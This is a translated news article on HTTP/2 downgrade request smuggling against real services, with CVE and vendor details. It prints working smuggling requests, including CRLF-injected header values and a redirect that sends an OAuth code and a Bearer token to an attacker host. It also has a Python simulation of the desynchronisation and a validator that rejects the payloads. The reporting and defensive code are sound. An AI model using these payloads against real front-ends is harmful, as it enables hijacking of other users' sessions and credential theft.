New attack on front-end/back-end systems allows wedging into other users' requests

Web systems in which the front-end accepts connections over HTTP/2 and forwards them to the back-end over HTTP/1.1 are exposed to a new variant of the "HTTP Request Smuggling" attack. By sending specially crafted client requests, an attacker can wedge into the content of requests from other users that are processed in the same stream between the front-end and the back-end. The attack can be used to inject malicious JavaScript code into a session with a legitimate site, bypass access-control systems and intercept authentication parameters.

The problem affects web proxies, load balancers, web accelerators, content delivery systems and other configurations in which requests are routed from a front-end to a back-end. The author of the research demonstrated the attack against systems at Netflix, Verizon, Bitbucket, the Netlify CDN and Atlassian, and received 56 thousand dollars in bug bounty programmes for the vulnerabilities found. The problem was also confirmed in F5 Networks products. It partially affects mod_proxy in the Apache HTTP Server (CVE-2021-33193), with a fix expected in release 2.4.49 (the developers were notified of the problem in early May and given three months to fix it). In nginx, the ability to specify the "Content-Length" and "Transfer-Encoding" headers at the same time was blocked in the latest release. Attack tooling has already been added to the Burp toolkit and is available through the Turbo Intruder extension.

The principle behind the new method of wedging requests into traffic is similar to the vulnerability identified by the same researcher two years ago, which was limited to front-ends that accept requests over HTTP/1.1. Recall that in a front-end/back-end scheme, client requests are received by one node, the front-end, which establishes a long-lived TCP connection to the back-end, and the back-end processes the requests directly. Over this shared connection, requests from different users are usually forwarded one after another in a chain, delimited by means of the HTTP protocol itself.

The classic "HTTP Request Smuggling" attack relies on the front-end and the back-end interpreting the HTTP headers "Content-Length" (which gives the total size of the data in the request) and "Transfer-Encoding: chunked" (which allows the data to be transmitted in pieces) differently. For example, if the front-end honours only "Content-Length" and ignores "Transfer-Encoding: chunked", an attacker can send a request carrying both headers, with a "Content-Length" value that does not match the size of the chunked chain. The front-end then processes and forwards the request according to "Content-Length", while the back-end waits for the chunked body to complete according to "Transfer-Encoding: chunked", and the remaining tail of the attacker's request ends up at the start of the next request, which belongs to another user.

Unlike the text protocol HTTP/1.1, which is parsed line by line, HTTP/2 is a binary protocol that works with data blocks (frames) of a declared size. HTTP/2 nevertheless carries header fields that correspond to the ordinary HTTP headers, plus pseudo-header fields (":method", ":path", ":authority") that replace the HTTP/1.1 request line. When it talks to the back-end over HTTP/1.1, the front-end translates these fields into the equivalent HTTP/1.1 request line and headers. The problem is that the back-end decides how to split the stream based on the HTTP headers written by the front-end, without any knowledge of how the original HTTP/2 request was framed.

In particular, "content-length" and "transfer-encoding" header fields can be passed in an HTTP/2 request even though they are not used in HTTP/2, where the total body size is determined by the frame lengths. When the HTTP/2 request is converted to HTTP/1.1, however, these headers are carried over and can mislead the back-end. There are two main attack variants, H2.TE and H2.CL, in which the back-end is misled by a transfer-encoding header or a content-length value that does not match the actual size of the request body the front-end received over HTTP/2.


An example of the H2.CL attack is specifying an incorrect size in the content-length header field when sending an HTTP/2 request to Netflix. This request causes the front-end to add the corresponding HTTP Content-Length header when it contacts the back-end over HTTP/1.1, but since the size given in Content-Length is smaller than the actual body size, the trailing part of the data is processed as the start of the next request.

For example, the HTTP/2 request

    :method    POST
    :path      /n
    :authority www.netflix.com
    content-length 4

    abcdGET /n HTTP/1.1
    Host: 02.rs?x.netflix.com
    Foo: bar

causes the following request to be sent to the back-end:

    POST /n HTTP/1.1
    Host: www.netflix.com
    Content-Length: 4

    abcdGET /n HTTP/1.1
    Host: 02.rs?x.netflix.com
    Foo: bar

Since Content-Length has the value 4, the back-end accepts only "abcd" as the request body, and everything else, "GET /n HTTP/1.1...", is treated as the start of the next request, which belongs to a different user. As a result the stream is desynchronised, and the response to that next request is the result of processing the attacker's dummy request. In the Netflix case, specifying a third-party host in the "Host:" header of the dummy request caused the client to receive the response "Location: https://02.rs?x.netflix.com/n", which allows arbitrary content to be served to the client, including running the attacker's own JavaScript code in the context of the Netflix site.

The second attack variant (H2.TE) involves smuggling in the "Transfer-Encoding: chunked" header. The specification prohibits the transfer-encoding header field in HTTP/2 and requires requests containing it to be treated as malformed. Despite this, some front-end implementations do not enforce this requirement and allow a transfer-encoding header field to be sent in HTTP/2, which is then converted into the equivalent HTTP/1.1 header. When a "Transfer-Encoding" header is present, the back-end may give it priority and split the data piece by piece in "chunked" mode, using blocks of varying size in the format "{size}\r\n{block}\r\n{size}\r\n{block}\r\n0", regardless of the original split by total size.

The existence of this vulnerability was demonstrated with the Verizon example. The problem concerned the authentication portal and content management system that is also used by sites such as the Huffington Post and Engadget. For example, the client request over HTTP/2

    :method    POST
    :path      /identity/XUI
    :authority id.b2b.oath.com
    transfer-encoding chunked

    0

    GET /oops HTTP/1.1
    Host: psres.net
    Content-Length: 10

    x=

resulted in the following HTTP/1.1 request being sent to the back-end:

    POST /identity/XUI HTTP/1.1
    Host: id.b2b.oath.com
    Content-Length: 66
    Transfer-Encoding: chunked

    0

    GET /oops HTTP/1.1
    Host: psres.net
    Content-Length: 10

    x=

The back-end, in turn, ignored the "Content-Length" header and split the stream according to "Transfer-Encoding: chunked". In practice, the attack made it possible to redirect users' requests to the attacker's site, including intercepting OAuth authentication requests whose parameters showed up in the Referer header, as well as to forge an authentication session and make users' systems send their credentials to the attacker's host:

    GET /b2blanding/show/oops HTTP/1.1
    Host: psres.net
    Referer: https://id.b2b.oath.com/?…&code=secret

    GET / HTTP/1.1
    Host: psres.net
    Authorization: Bearer eyJhcGwiOiJIUzI1GiCI1sIkInR6…
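The two desynchronisations above, H2.CL (the Netflix case) and H2.TE (the Verizon case), can be reproduced offline with the following model. This is an added example, not code from the article or from the researcher's tooling: downgrade_h2_to_h1 plays the role of a lax front-end, parse_h1_requests plays the role of a back-end that prefers Transfer-Encoding over Content-Length, and the second ("victim") request on each connection is constructed for the demonstration, with a made-up cookie and OAuth code.

```python
# Added example, not code from the article or from the research it reports on:
# a model of a front-end that downgrades HTTP/2 to HTTP/1.1 and of a back-end
# that re-parses the resulting byte stream. Hosts and attacker payloads are the
# ones quoted in the article; the second ("victim") request on each connection
# is constructed for the demonstration.


def downgrade_h2_to_h1(pseudo, headers, body):
    """Naive HTTP/2 -> HTTP/1.1 rewrite as a vulnerable front-end performs it:
    pseudo-headers become the request line and Host, every other header field is
    copied through verbatim (content-length and transfer-encoding included,
    although neither has any meaning in HTTP/2), and a Content-Length computed
    from the body actually received is appended only if the client sent none."""
    canon = lambda n: "-".join(p.capitalize() for p in n.split("-"))
    out = "%s %s HTTP/1.1\r\nHost: %s\r\n" % (
        pseudo[":method"], pseudo[":path"], pseudo[":authority"])
    for name, value in headers:
        out += "%s: %s\r\n" % (canon(name), value)
    if not any(n.lower() == "content-length" for n, _ in headers):
        out += "Content-Length: %d\r\n" % len(body)
    return out.encode() + b"\r\n" + body


def parse_h1_requests(stream):
    """Back-end parser: splits one persistent connection's byte stream into
    requests. Like the back-ends described in the article it gives
    Transfer-Encoding: chunked priority over Content-Length when both are
    present; for duplicate header names the first occurrence wins."""
    reqs, pos = [], 0
    while pos < len(stream):
        end = stream.find(b"\r\n\r\n", pos)
        if end < 0:  # header block not finished yet: keep waiting for more bytes
            reqs.append({"line": None, "headers": {}, "body": stream[pos:]})
            break
        lines = stream[pos:end].decode("latin-1").split("\r\n")
        hdrs = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            hdrs.setdefault(name.strip().lower(), value.strip())
        pos = end + 4
        if hdrs.get("transfer-encoding", "").lower() == "chunked":
            body = b""
            while True:  # {size-hex}\r\n{block}\r\n ... 0\r\n\r\n
                nl = stream.find(b"\r\n", pos)
                if nl < 0:
                    raise ValueError("truncated chunk")
                size = int(stream[pos:nl], 16)
                pos = nl + 2
                if size == 0:
                    pos += 2  # CRLF that closes the last-chunk (trailers not modelled)
                    break
                body += stream[pos:pos + size]
                pos += size + 2
        else:
            size = int(hdrs.get("content-length", "0"))
            body = stream[pos:pos + size]
            pos += size
        reqs.append({"line": lines[0], "headers": hdrs, "body": body})
    return reqs


def h2_cl_attack():
    """H2.CL (the Netflix case): content-length 4 is smaller than the real body,
    so the back-end treats the body's tail as a new request, and the next
    user's request on the connection is absorbed into that attacker-controlled
    request (its first line lands inside the 'Foo' header value)."""
    body = b"abcdGET /n HTTP/1.1\r\nHost: 02.rs?x.netflix.com\r\nFoo: bar"
    wire = downgrade_h2_to_h1(
        {":method": "POST", ":path": "/n", ":authority": "www.netflix.com"},
        [("content-length", "4")], body)
    victim = (b"GET /account HTTP/1.1\r\nHost: www.netflix.com\r\n"
              b"Cookie: session=VICTIM\r\n\r\n")  # constructed second user
    return parse_h1_requests(wire + victim)


def h2_te_attack():
    """H2.TE (the Verizon case): the front-end forwards a transfer-encoding
    header and adds Content-Length: 66 itself; the back-end prefers chunked,
    stops at the 0 chunk, and the smuggled GET /oops (Content-Length: 10)
    swallows the first bytes of the next user's request."""
    body = (b"0\r\n\r\nGET /oops HTTP/1.1\r\nHost: psres.net\r\n"
            b"Content-Length: 10\r\n\r\nx=")
    wire = downgrade_h2_to_h1(
        {":method": "POST", ":path": "/identity/XUI", ":authority": "id.b2b.oath.com"},
        [("transfer-encoding", "chunked")], body)
    victim = (b"GET /b2blanding/show/oops HTTP/1.1\r\nHost: id.b2b.oath.com\r\n"
              b"Referer: https://id.b2b.oath.com/?code=secret\r\n\r\n")  # constructed
    return parse_h1_requests(wire + victim)


if __name__ == "__main__":
    for req in h2_cl_attack() + h2_te_attack():
        print(req["line"], req["headers"], req["body"])
```

In the H2.CL run the back-end yields two requests: the attacker's POST with body "abcd", then a GET /n whose Host is 02.rs?x.netflix.com and whose "Foo" header has swallowed the victim's request line while the victim's Cookie is now part of the attacker's request. In the H2.TE run the first request has an empty chunked body, the second is the smuggled GET /oops whose 10-byte body is "x=" plus the first eight bytes of the victim's request, and the victim's remainder is parsed as a third, garbage request. Note that the front-end's own Content-Length: 66 is computed correctly and is simply ignored by the back-end.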

To attack HTTP/2 implementations that do not allow a transfer-encoding header field to be specified directly, another method was proposed: smuggling the "Transfer-Encoding" header by appending it to the value of another header field after a newline (when converted to HTTP/1.1 this produces two separate HTTP headers).

For example, Atlassian Jira and the Netlify CDN (used to serve the start page of Mozilla Firefox) were affected by this problem. Specifically, the HTTP/2 request

    :method    POST
    :path      /
    :authority start.mozilla.org
    foo        b\r\n
               transfer-encoding: chunked

    0\r\n
    \r\n
    GET / HTTP/1.1\r\n
    Host: evil-netlify-domain\r\n
    Content-Length: 5\r\n
    \r\n
    x=

caused the following HTTP/1.1 request to be sent to the back-end:

    POST / HTTP/1.1\r\n
    Host: start.mozilla.org\r\n
    Foo: b\r\n
    Transfer-Encoding: chunked\r\n
    Content-Length: 71\r\n
    \r\n
    0\r\n
    \r\n
    GET / HTTP/1.1\r\n
    Host: evil-netlify-domain\r\n
    Content-Length: 5\r\n
    \r\n
    x=

Another way of smuggling the "Transfer-Encoding" header was to append it to the name of another header field, or to the pseudo-header that carries the request method. For example, when accessing Atlassian Jira, a fake header with the name "foo: bar\r\ntransfer-encoding" and the value "chunked" caused the HTTP headers "foo: bar" and "transfer-encoding: chunked" to be added, and giving the ":method" pseudo-header the value "GET / HTTP/1.1\r\nTransfer-encoding: chunked" produced an HTTP/1.1 request beginning "GET / HTTP/1.1\r\ntransfer-encoding: chunked".
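All of the variants above (a bogus content-length, a forwarded transfer-encoding, CRLF in a header value, CRLF in a header name or in ":method") are caught by the same validation step, which a front-end has to perform before it writes an HTTP/1.1 request line and headers from HTTP/2 header fields. The following is an added example, not code from the article or from any vendor it names; the attack inputs are the article's own payloads, and the ":authority" used for the Jira cases is a placeholder because the article does not give one.

```python
# Added example (not code from the article, nor from any product it names): the
# validation a front-end must perform before rewriting an HTTP/2 request as
# HTTP/1.1, exercised against the payloads quoted in the article. The
# ':authority' for the Jira cases is a placeholder; the article does not give it.
import re

# RFC 7230 token characters, restricted to lowercase as HTTP/2 requires of
# header field names. Anything else (colon, space, CR, LF) is a splitting attempt.
_TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9a-z]+$")
# Control characters other than HTAB are never legal in a field value; CR and LF
# are exactly what the header-splitting payloads in the article rely on.
_BAD_VALUE = re.compile(r"[\x00-\x08\x0a-\x1f\x7f]")
# Connection-specific header fields must not appear in HTTP/2 (RFC 7540 8.1.2.2).
_CONNECTION_SPECIFIC = {"connection", "keep-alive", "proxy-connection",
                        "transfer-encoding", "upgrade"}


class MalformedRequest(ValueError):
    """The request must be refused with a stream error, not forwarded."""


def safe_downgrade(pseudo, headers, body):
    """Validate, then rewrite to HTTP/1.1 with a Content-Length derived from the
    bytes actually received in DATA frames, never from a client-supplied value."""
    for name in (":method", ":path", ":authority"):
        value = pseudo.get(name, "")
        if not value or re.search(r"\s", value):  # no CR, LF, SP or HTAB
            raise MalformedRequest("bad pseudo-header %s" % name)
    if not re.fullmatch(r"[A-Z]+", pseudo[":method"]):
        raise MalformedRequest("bad :method")
    for name, value in headers:
        if not _TOKEN.match(name):
            raise MalformedRequest("illegal header name %r" % name)
        if _BAD_VALUE.search(value):
            raise MalformedRequest("control character in header %s" % name)
        if name in _CONNECTION_SPECIFIC:
            raise MalformedRequest("connection-specific header %s" % name)
        if name == "te" and value != "trailers":
            raise MalformedRequest("te must be 'trailers'")
        if name == "content-length" and value != str(len(body)):
            raise MalformedRequest("content-length %s does not match %d body bytes"
                                   % (value, len(body)))
    out = "%s %s HTTP/1.1\r\nHost: %s\r\n" % (
        pseudo[":method"], pseudo[":path"], pseudo[":authority"])
    for name, value in headers:
        if name != "content-length":  # replaced by the value computed below
            out += "%s: %s\r\n" % (name, value)
    out += "Content-Length: %d\r\n\r\n" % len(body)
    return out.encode() + body


def reject_reason(pseudo, headers, body):
    """None if the request would be forwarded, otherwise why it was refused."""
    try:
        safe_downgrade(pseudo, headers, body)
        return None
    except MalformedRequest as exc:
        return str(exc)


NETFLIX = {":method": "POST", ":path": "/n", ":authority": "www.netflix.com"}
# The attack payloads from the article; each must be refused.
PAYLOADS = {
    "h2.cl (Netflix)": (NETFLIX, [("content-length", "4")],
                        b"abcdGET /n HTTP/1.1\r\nHost: 02.rs?x.netflix.com\r\nFoo: bar"),
    "h2.te (Verizon)": ({":method": "POST", ":path": "/identity/XUI",
                         ":authority": "id.b2b.oath.com"},
                        [("transfer-encoding", "chunked")],
                        b"0\r\n\r\nGET /oops HTTP/1.1\r\nHost: psres.net\r\nContent-Length: 10\r\n\r\nx="),
    "crlf in value (Netlify)": ({":method": "POST", ":path": "/", ":authority": "start.mozilla.org"},
                                [("foo", "b\r\ntransfer-encoding: chunked")],
                                b"0\r\n\r\nGET / HTTP/1.1\r\nHost: evil-netlify-domain\r\nContent-Length: 5\r\n\r\nx="),
    "crlf in name (Atlassian)": ({":method": "POST", ":path": "/", ":authority": "jira.example"},
                                 [("foo: bar\r\ntransfer-encoding", "chunked")], b"0\r\n\r\n"),
    "crlf in :method (Atlassian)": ({":method": "GET / HTTP/1.1\r\nTransfer-encoding: chunked",
                                     ":path": "/", ":authority": "jira.example"}, [], b"0\r\n\r\n"),
}
# A well-formed request that is forwarded with a recomputed Content-Length.
BENIGN = (NETFLIX, [("content-type", "text/plain")], b"abcd")

if __name__ == "__main__":
    for label, args in PAYLOADS.items():
        print("%-28s -> %s" % (label, reject_reason(*args)))
    print(safe_downgrade(*BENIGN))
```

The design point is that the front-end never copies a client-supplied length or framing header into the HTTP/1.1 request: the body size is known exactly from the DATA frames, so the only correct Content-Length is the one computed from them, and any disagreement with a client "content-length" is reason to refuse the stream rather than to pick a side. Rejecting control characters in names and values closes the header-splitting variants, and dropping connection-specific fields closes H2.TE; these are the checks the HTTP/2 specification already requires of intermediaries, which the affected front-ends in the article did not perform.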

The researcher who found the problem also proposed a request tunnelling technique for attacking front-ends in which each client IP address gets its own connection to the back-end, so traffic from different users is not mixed. The proposed technique does not allow interfering with other users' requests, but it does make it possible to poison a shared cache that affects the processing of other requests, and to overwrite internal HTTP headers used to pass service information from the front-end to the back-end (for example, when authentication is performed on the front-end, such headers may carry information about the current user to the back-end). As an example of applying the method in practice, cache poisoning made it possible to gain control over pages in the Bitbucket service.

Source: opennet.ru
